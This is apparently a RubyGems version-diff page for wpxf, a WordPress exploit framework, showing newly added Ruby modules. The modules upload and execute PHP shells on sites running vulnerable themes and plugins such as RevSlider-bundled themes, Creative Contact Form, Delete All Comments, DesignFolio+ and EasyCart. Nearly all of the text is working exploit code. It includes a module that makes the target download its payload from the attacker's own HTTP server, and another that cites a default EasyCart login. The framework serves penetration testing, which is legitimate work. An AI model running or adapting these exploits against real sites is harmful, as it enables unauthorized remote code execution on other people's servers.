RubyGems - wpxf - Versions diffs - 2.0.0a - Mend

wpxf 2.0.0a

Files changed (455) hide show

data/lib/wpxf/modules/exploit/shell/bretheon_revslider_shell_upload.rb ADDED

@@ -0,0 +1,15 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::BretheonRevsliderShellUpload < Wpxf::Exploit::RevsliderShellUpload
+  def initialize
+    super
+    update_info(
+      name: 'Bretheon Theme RevSlider <= 3.0.95 Shell Upload',
+      desc: 'This module exploits a file upload vulnerability in versions of '\
+            'the Bretheon theme that include versions <= 3.0.95 of the '\
+            'RevSlider plugin which allows unauthenticated users to upload '\
+            'and execute PHP scripts in the context of the web server.'
+    )
+  end
+end

data/lib/wpxf/modules/exploit/shell/centum_revslider_shell_upload.rb ADDED

@@ -0,0 +1,15 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::CentumRevsliderShellUpload < Wpxf::Exploit::RevsliderShellUpload
+  def initialize
+    super
+    update_info(
+      name: 'Centum Theme RevSlider <= 3.0.95 Shell Upload',
+      desc: 'This module exploits a file upload vulnerability in versions of '\
+            'the Centum theme that include versions <= 3.0.95 of the '\
+            'RevSlider plugin which allows unauthenticated users to upload '\
+            'and execute PHP scripts in the context of the web server.'
+    )
+  end
+end

data/lib/wpxf/modules/exploit/shell/charity_theme_shell_upload.rb ADDED

@@ -0,0 +1,38 @@
+# frozen_string_literal: true
+require 'socket'
+require_rel './simplecart_shell_upload'
+class Wpxf::Exploit::CharityThemeShellUpload < Wpxf::Exploit::SimplecartShellUpload
+  include Wpxf
+  def initialize
+    super
+    update_info(
+      name: 'Charity Theme Shell Upload',
+      desc: 'This module exploits a file upload vulnerability in all versions '\
+            'of the Charity theme found in the upload_file.php script '\
+            'which contains no session or file validation. It allows '\
+            'unauthenticated users to upload files of any type and '\
+            'subsequently execute PHP scripts in the context of the '\
+            'web server.',
+      author: [
+        'Divya',     # Vulnerability disclosure
+        'rastating'  # WPXF module
+      ],
+      references: [
+        ['EDB', '36611']
+      ],
+      date: 'April 02 2015'
+    )
+  end
+  def check
+    check_theme_version_from_readme('charity')
+  end
+  def plugin_url
+    normalize_uri(wordpress_url_themes, 'charity')
+  end
+end

data/lib/wpxf/modules/exploit/shell/construct_revslider_shell_upload.rb ADDED

@@ -0,0 +1,15 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::ConstructRevsliderShellUpload < Wpxf::Exploit::RevsliderShellUpload
+  def initialize
+    super
+    update_info(
+      name: 'Construct Theme RevSlider <= 3.0.95 Shell Upload',
+      desc: 'This module exploits a file upload vulnerability in versions of '\
+            'the Construct theme that include versions <= 3.0.95 of the '\
+            'RevSlider plugin which allows unauthenticated users to upload '\
+            'and execute PHP scripts in the context of the web server.'
+    )
+  end
+end

data/lib/wpxf/modules/exploit/shell/creative_contact_form_shell_upload.rb ADDED

@@ -0,0 +1,82 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::CreativeContactFormShellUpload < Wpxf::Module
+  include Wpxf
+  def initialize
+    super
+    update_info(
+      name: 'Creative Contact Form Shell Upload',
+      desc: 'This module exploits a file upload vulnerability in all versions '\
+            'of the Creative Contact Form plugin prior to version 0.9.8 which '\
+            'allows unauthenticated users to upload and execute PHP scripts '\
+            'in the context of the web server.',
+      author: [
+        'Gianni Angelozzi', # Vulnerability discovery
+        'rastating'         # WPXF module
+      ],
+      references: [
+        ['EDB', '35057'],
+        ['WPVDB', '7652']
+      ],
+      date: 'Oct 22 2014'
+    )
+  end
+  def check
+    check_plugin_version_from_readme('sexy-contact-form', '0.9.8')
+  end
+  def plugin_url
+    normalize_uri(wordpress_url_plugins, 'sexy-contact-form')
+  end
+  def uploader_url
+    normalize_uri(plugin_url, 'includes', 'fileupload', 'index.php')
+  end
+  def payload_body_builder(payload_name)
+    builder = Utility::BodyBuilder.new
+    builder.add_file_from_string('files[]', payload.encoded, payload_name)
+    builder
+  end
+  def run
+    return false unless super
+    emit_info 'Preparing payload...'
+    payload_name = "#{Utility::Text.rand_alpha(rand(5..10))}.php"
+    builder = payload_body_builder(payload_name)
+    emit_info 'Uploading payload...'
+    res = nil
+    builder.create do |body|
+      res = execute_post_request(url: uploader_url, body: body)
+    end
+    if res.nil? || res.timed_out?
+      emit_error 'No response from the target'
+      return false
+    end
+    if res.code != 200 || res.body !~ /files|#{Regexp.escape(payload_name)}/
+      emit_info "Response code: #{res.code}", true
+      emit_info "Response body: #{res.body}", true
+      emit_error 'Failed to upload payload'
+      return false
+    end
+    payload_url = normalize_uri(plugin_url, 'includes', 'fileupload', 'files', payload_name)
+    emit_success "Uploaded the payload to #{payload_url}", true
+    emit_info 'Executing the payload...'
+    res = execute_get_request(url: payload_url)
+    if res && res.code == 200 && !res.body.strip.empty?
+      emit_success "Result: #{res.body}"
+    end
+    return true
+  end
+end

data/lib/wpxf/modules/exploit/shell/delete_all_comments_shell_upload.rb ADDED

@@ -0,0 +1,65 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::DeleteAllCommentsShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ShellUpload
+  include Wpxf::Net::HttpServer
+  def initialize
+    super
+    update_info(
+      name: 'Delete All Comments Unauthenticated Shell Upload',
+      author: [
+        'NinTechNet', # Discovery and disclosure
+        'rastating'   # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8694'],
+        ['URL', 'http://blog.nintechnet.com/arbitrary-file-upload-vulnerability-in-wordpress-delete-all-comments-plugin/']
+      ],
+      date: 'Dec 10 2016'
+    )
+    register_options([
+      StringOption.new(
+        name: 'http_server_host',
+        desc: 'The external address of the host running this module',
+        required: true
+      )
+    ])
+  end
+  def check
+    check_plugin_version_from_readme('delete-all-comments')
+  end
+  def uploader_url
+    normalize_uri(wordpress_url_plugins, 'delete-all-comments', 'delete-all-comments.php')
+  end
+  def download_url
+    "http://#{datastore['http_server_host']}:#{http_server_bind_port}/#{Utility::Text.rand_alpha(8)}/#{payload_name}"
+  end
+  def payload_body_builder
+    builder = Utility::BodyBuilder.new
+    builder.add_field('restorefromfileURL', download_url)
+    builder.add_field('restorefromfileNAME', payload_name)
+    builder
+  end
+  def uploaded_payload_location
+    normalize_uri(wordpress_url_plugins, 'delete-all-comments', 'backup', payload_name)
+  end
+  def on_http_request(_path, _params, _headers)
+    payload.encoded
+  end
+  def run
+    start_http_server(true)
+    success = super
+    stop_http_server
+    success
+  end
+end

data/lib/wpxf/modules/exploit/shell/designfolio_plus_shell_upload.rb ADDED

@@ -0,0 +1,50 @@
+# frozen_string_literal: true
+require 'socket'
+class Wpxf::Exploit::DesignfolioPlusShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ShellUpload
+  def initialize
+    super
+    update_info(
+      name: 'DesignFolio+ Theme Unauthenticated Shell Upload',
+      author: [
+        'CrashBandicot', # Vulnerability disclosure
+        'rastating'      # WPXF module
+      ],
+      references: [
+        ['WPVDB', '7880'],
+        ['EDB', '36372']
+      ],
+      date: 'Mar 04 2015'
+    )
+  end
+  def check
+    check_theme_version_from_readme('designfolio-plus')
+  end
+  def uploader_url
+    normalize_uri(wordpress_url_themes, 'designfolio-plus', 'admin', 'upload-file.php')
+  end
+  def encoded_relative_path_to_uploads
+    Base64.strict_encode64('../../../uploads')
+  end
+  def payload_body_builder
+    target_ip = IPSocket.getaddress(target_host)
+    field_name = Utility::Text.md5(target_ip)
+    builder = Utility::BodyBuilder.new
+    builder.add_file_from_string(field_name, payload.encoded, payload_name)
+    builder.add_field('upload_path', encoded_relative_path_to_uploads)
+    builder
+  end
+  def uploaded_payload_location
+    normalize_uri(wordpress_url_uploads, payload_name.downcase)
+  end
+end

data/lib/wpxf/modules/exploit/shell/divi_revslider_shell_upload.rb ADDED

@@ -0,0 +1,15 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::DiviRevsliderShellUpload < Wpxf::Exploit::RevsliderShellUpload
+  def initialize
+    super
+    update_info(
+      name: 'Divi Theme RevSlider <= 3.0.95 Shell Upload',
+      desc: 'This module exploits a file upload vulnerability in versions of '\
+            'the Divi theme that include versions <= 3.0.95 of the '\
+            'RevSlider plugin which allows unauthenticated users to upload '\
+            'and execute PHP scripts in the context of the web server.'
+    )
+  end
+end

data/lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb ADDED

@@ -0,0 +1,174 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::EasyCartShellUpload < Wpxf::Module
+  include Wpxf
+  include Wpxf::Net::HttpClient
+  include Wpxf::WordPress::Login
+  def initialize
+    super
+    update_info(
+      name: 'EasyCart Shell Upload',
+      desc: 'WordPress Shopping Cart (WP EasyCart) Plugin for WordPress '\
+            'contains a flaw that allows a remote attacker to execute '\
+            'arbitrary PHP code. This flaw exists because the '\
+            '/inc/amfphp/administration/banneruploaderscript.php script does '\
+            'not properly verify or sanitize user-uploaded files. By '\
+            'uploading a .php file, the remote system will place the file in '\
+            'a user-accessible path. Making a direct request to the uploaded '\
+            'file will allow the attacker to execute the script with the '\
+            'privileges of the web server.'\
+            "\n"\
+            'In versions <= 3.0.8 authentication can be done by using the '\
+            'WordPress credentials of a user with any role. In later '\
+            'versions, a valid EasyCart admin password will be required that '\
+            'is in use by any admin user. A default installation of EasyCart '\
+            'will setup a user called "demouser" with a preset password '\
+            'of "demouser".',
+      author: [
+        'Kacper Szurek', # Vulnerability disclosure
+        'rastating'      # WPXF module
+      ],
+      references: [
+        ['WPVDB', '7745']
+      ],
+      date: 'Jan 08 2015'
+    )
+    register_options([
+      StringOption.new(
+        name: 'username',
+        desc: 'The WordPress username to authenticate with (versions <= 3.0.8)'
+      ),
+      StringOption.new(
+        name: 'password',
+        desc: 'The WordPress password to authenticate with (versions <= 3.0.8)'
+      ),
+      StringOption.new(
+        name: 'ec_password',
+        desc: 'The EasyCart password to authenticate with (versions <= 3.0.18)'
+      ),
+      BooleanOption.new(
+        name: 'ec_password_is_hash',
+        desc: 'Whether or not ec_password is an MD5 hash',
+        default: false
+      )
+    ])
+  end
+  def username
+    normalized_option_value('username')
+  end
+  def password
+    normalized_option_value('password')
+  end
+  def ec_password
+    normalized_option_value('ec_password')
+  end
+  def ec_password_is_hash
+    normalized_option_value('ec_password_is_hash')
+  end
+  def use_wordpress_authentication
+    username.to_s != '' && password.to_s != ''
+  end
+  def use_ec_authentication
+    ec_password.to_s != ''
+  end
+  def req_id
+    if ec_password_is_hash
+      return ec_password
+    else
+      return Utility::Text.md5(ec_password)
+    end
+  end
+  def check
+    check_plugin_version_from_readme('wp-easycart', '3.0.19')
+  end
+  def plugin_url
+    normalize_uri(wordpress_url_plugins, 'wp-easycart')
+  end
+  def uploader_url
+    normalize_uri(plugin_url, 'inc', 'amfphp', 'administration', 'banneruploaderscript.php')
+  end
+  def payload_body_builder(date_hash, payload_name, include_req_id)
+    builder = Utility::BodyBuilder.new
+    builder.add_field('datemd5', date_hash)
+    builder.add_file_from_string('Filedata', payload.encoded, payload_name)
+    builder.add_field('reqID', req_id) if include_req_id
+    builder
+  end
+  def run
+    return false unless super
+    if !use_wordpress_authentication && !use_ec_authentication
+      emit_error 'You must set either the username and password options or '\
+                 'specify an ec_password value'
+      return false
+    end
+    if use_wordpress_authentication && use_ec_authentication
+      emit_info 'Both EasyCart and WordPress credentials were supplied, '\
+                'attempting WordPress first...'
+    end
+    if use_wordpress_authentication
+      emit_info "Authenticating using #{username}:#{password}..."
+      cookie = wordpress_login(username, password)
+      if !cookie
+        if use_ec_authentication
+          emit_warning 'Failed to authenticate with WordPress, attempting '\
+                       'upload with EC password next...'
+        else
+          emit_error 'Failed to authenticate with WordPress'
+          return false
+        end
+      else
+        emit_success 'Authenticated with WordPress', true
+      end
+    end
+    emit_info 'Preparing payload...'
+    payload_name = Utility::Text.rand_alpha(10)
+    date_hash = Utility::Text.md5(Time.now.to_s)
+    uploaded_filename = "#{payload_name}_#{date_hash}.php"
+    payload_url = normalize_uri(plugin_url, 'products', 'banners', uploaded_filename)
+    builder = payload_body_builder(
+      date_hash,
+      "#{payload_name}.php",
+      use_ec_authentication
+    )
+    emit_info 'Uploading payload...'
+    res = nil
+    builder.create do |body|
+      res = execute_post_request(url: uploader_url, body: body, cookie: cookie)
+    end
+    if res.nil? || res.code != 200
+      emit_error 'Failed to upload payload'
+      emit_error "Server responded with code #{res.code}", true
+      return false
+    end
+    emit_info 'Executing the payload...'
+    res = execute_get_request(url: payload_url)
+    if res && res.code == 200 && !res.body.strip.empty?
+      emit_success "Result: #{res.body}"
+    end
+    true
+  end
+end